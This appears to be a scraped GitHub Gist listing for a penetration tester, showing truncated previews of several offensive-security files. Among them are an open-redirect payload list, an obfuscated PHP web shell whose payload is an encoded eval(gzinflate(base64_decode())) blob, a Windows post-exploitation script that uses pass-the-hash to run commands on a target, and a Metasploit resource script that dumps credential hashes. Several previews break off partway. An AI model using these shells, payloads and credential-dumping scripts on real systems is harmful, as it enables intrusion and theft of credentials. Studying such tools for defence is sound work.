xer0dayz 1N3
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://google.com | |
| //google.com | |
| \\google.com | |
| \/google.com | |
| \/\/google.com | |
| /\google.com | |
| /\/\google.com | |
| |/google.com | |
| /%09/google.com | |
| /google.com |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # Enumer8 by 1N3 v20150705 | |
| # http://crowdshield.com | |
| # | |
| TARGET="$1" | |
| LHOST="192.168.1.132" | |
| LOOT_DIR="/pentest/loot" | |
| FINDSPLOIT_DIR="/pentest/findsploit" | |
| KEY_PATH="/pentest/linux/ssh/dsa/1024" |
1N3
/ reverse-engineering-wordpress-0day-exploit.txt
Last active
September 26, 2020 19:46
Reverse Engineering a Critical Wordpress 0day Exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| REVERSE ENGINEERING CRITICAL WORDPRESS 0day EXPLOIT | |
| This past weekend, I noticed an interesting alert from my mod_security logs for a request being made to my Wordpress site. Although the request was un-successful, I decided to dig deeper to understand what this was request was actually trying to do. After time, I've concluded that this is possibly a new 0day exploit attempt against Wordpress or a related Wordpress plugin (iThemes Security??). I'm still trying to uncover the exact flaw being exploited here so if anyone has any further details, feel free to contact me at [email protected] or twitter @CrowdShield. | |
| ORIGINAL MOD-SECURITY REUQUEST | |
| ==> /var/log/apache2/error.log <== | |
| [Sat Aug 15 19:00:10 2015] [error] [client 46.148.18.226] ModSecurity: Warning. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ'])) | |
| { | |
| $a1="Fil"; | |
| $c1="#d"; | |
| $c2="f5"; | |
| $color = $c1.$c2; | |
| $bs="esM"; | |
| $da="an"; | |
| $default_action = $a1.$bs.$da; |
1N3
/ preg_replace_WSO_2.5.php
Last active
October 28, 2018 22:04
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| This was done by taking the preg_replace() function and creating a new PHP file with the function and arguments and analyzing the results... | |
| <?php | |
| echo preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4CkREqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHCtPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEktN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzrumVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcumz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwjAQzKhlHgTkLPCodOWCzQSCFI4ETTYMzcsMMHT+Zs8sEExBOqWi2OfS3AGiwPL/ZhofPh+PQMmCJTN2UATKGzc3z87mAvF4ZnEaa4FbPQP/QH7riIhPdcp2hsAJswy3MH45YNzOAE7Y2+H4zYyImGfq818cOo/cEKw5kf9Bpswx1PphGLbidOayJS2dga8a+2mh1OuzA87Nrypk7LbLfN9sYaYoY/UGXb0AlD8p3I9v0rIKpwBd1zTZNDtOKicPU |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ____ | |
| _________ / _/___ ___ _____ | |
| / ___/ __ \ / // __ \/ _ \/ ___/ | |
| (__ ) / / // // /_/ / __/ / | |
| /____/_/ /_/___/ .___/\___/_/ | |
| /_/ | |
| + -- --=[http://crowdshield.com | |
| + -- --=[sn1per v1.3 by 1N3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * @fileoverview This file loads a bunch of HSTS domains and times how long it | |
| * takes for them to be redirected from HTTP to HTTPS. Based on that, it | |
| * decides whether the domain is a previously-noted HSTS domain or not. | |
| * @author yan <[email protected]> | |
| * @license MIT | |
| * @version 0.2.0 | |
| */ | |
| // Timing in milliseconds above which a network request probably occurred. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ____ | |
| _________ / _/___ ___ _____ | |
| / ___/ __ \ / // __ \/ _ \/ ___/ | |
| (__ ) / / // // /_/ / __/ / | |
| /____/_/ /_/___/ .___/\___/_/ | |
| /_/ | |
| + -- --=[http://crowdshield.com |
1N3
/ windows-post-exploitation.sh
Created
February 3, 2016 12:18
A Windows post exploitation shell script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| TARGET=$1 | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share" | |
| pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view" |
1N3
/ metasploit-post-exploitation-script-for-windows.rc
Created
February 3, 2016 12:22
Metasploit Post Exploitation Script For Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| setg SESSION 1 | |
| use post/windows/gather/smart_hashdump | |
| run | |
| use post/windows/gather/credentials/domain_hashdump | |
| run | |
| use post/windows/gather/credentials/mcafee_vse_hashdump | |
| run | |
| use post/windows/gather/credentials/mssql_local_hashdump | |
| run | |
| use post/windows/gather/hashdump |
OlderNewer